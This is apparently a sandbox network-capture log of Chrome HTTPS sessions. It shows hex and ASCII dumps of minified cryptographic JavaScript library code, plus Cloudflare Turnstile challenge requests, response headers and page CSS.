                                                                                                                                                            2024-10-08 03:08:43 UTC1369INData Raw: 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 35 5d 3d 65 5b 35 5d 2b 38 38 36 32 36 33 30 39
                                                                                                                                                            Data Ascii: ;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:0)|0,e[5]=e[5]+88626309
                                                                                                                                                            2024-10-08 03:08:43 UTC1369INData Raw: 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 33 5d 3d 49 5b 33 5d 2b 28 49 5b 32 5d 3c 3c
                                                                                                                                                            Data Ascii: +e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>16)|0,t[3]=I[3]+(I[2]<<
                                                                                                                                                            2024-10-08 03:08:43 UTC1369INData Raw: 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 77 6f 72 64
                                                                                                                                                            Data Ascii: ):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:function(t){for(var e=t.word
                                                                                                                                                            2024-10-08 03:08:43 UTC1369INData Raw: 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71
                                                                                                                                                            Data Ascii: =t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopq
                                                                                                                                                            2024-10-08 03:08:43 UTC1369INData Raw: 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 73 3d 74 5b 65 2b 30 5d 2c 63 3d 74 5b
                                                                                                                                                            Data Ascii: extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._hash.words,s=t[e+0],c=t[
                                                                                                                                                            2024-10-08 03:08:43 UTC1369INData Raw: 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29 2c 62 3d 44 28 62 2c 78 2c 53 2c 6d 2c 66 2c 32 31 2c 41 5b 35 31
                                                                                                                                                            Data Ascii: C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]),b=D(b,x,S,m,f,21,A[51


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            10192.168.2.549728104.18.94.414434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:44 UTC804OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jm7z9/0x4AAAAAAAkfshsNV9pF8gSH/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                            Sec-Fetch-Dest: iframe
                                                                                                                                                            Referer: https://gzevp.castragouse.com/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:08:44 UTC1369INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:44 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Content-Length: 164872
                                                                                                                                                            Connection: close
                                                                                                                                                            permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                            referrer-policy: same-origin
                                                                                                                                                            critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                            cross-origin-opener-policy: same-origin
                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                            content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                                                            origin-agent-cluster: ?1
                                                                                                                                                            cross-origin-embedder-policy: require-corp
                                                                                                                                                            accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                            document-policy: js-profiling
                                                                                                                                                            2024-10-08 03:08:44 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 66 32 65 64 39 61 36 63 32 36 34 31 64 65 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: Server: cloudflareCF-RAY: 8cf2ed9a6c2641de-EWR
                                                                                                                                                            2024-10-08 03:08:44 UTC1317INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                            2024-10-08 03:08:44 UTC1369INData Raw: 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62
                                                                                                                                                            Data Ascii: %;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-web
                                                                                                                                                            2024-10-08 03:08:44 UTC1369INData Raw: 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74
                                                                                                                                                            Data Ascii: ght:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;st
                                                                                                                                                            2024-10-08 03:08:44 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e
                                                                                                                                                            Data Ascii: allenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challen
                                                                                                                                                            2024-10-08 03:08:44 UTC1369INData Raw: 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70
                                                                                                                                                            Data Ascii: dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop
                                                                                                                                                            2024-10-08 03:08:44 UTC1369INData Raw: 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65
                                                                                                                                                            Data Ascii: ,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-dasharray:166;stroke-dashoffse
                                                                                                                                                            2024-10-08 03:08:44 UTC1369INData Raw: 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c
                                                                                                                                                            Data Ascii: n:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-start;display:flex;flex-flow:col
                                                                                                                                                            2024-10-08 03:08:44 UTC1369INData Raw: 72 74 6c 7d 2e 72 74 6c 20 2e 63 62 2d 6c 62 2d 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78
                                                                                                                                                            Data Ascii: rtl}.rtl .cb-lb-t{margin-left:0;margin-right:8px;padding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px
                                                                                                                                                            2024-10-08 03:08:44 UTC1369INData Raw: 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c
                                                                                                                                                            Data Ascii: challenge-error-title a{color:#232323}#challenge-error-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#chall


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            11192.168.2.549730104.18.94.414434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:44 UTC383OUTGET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1
                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept: */*
                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:08:45 UTC441INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:44 GMT
                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                            Content-Length: 47262
                                                                                                                                                            Connection: close
                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                            last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                                                                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8cf2ed9cec5d41ba-EWR
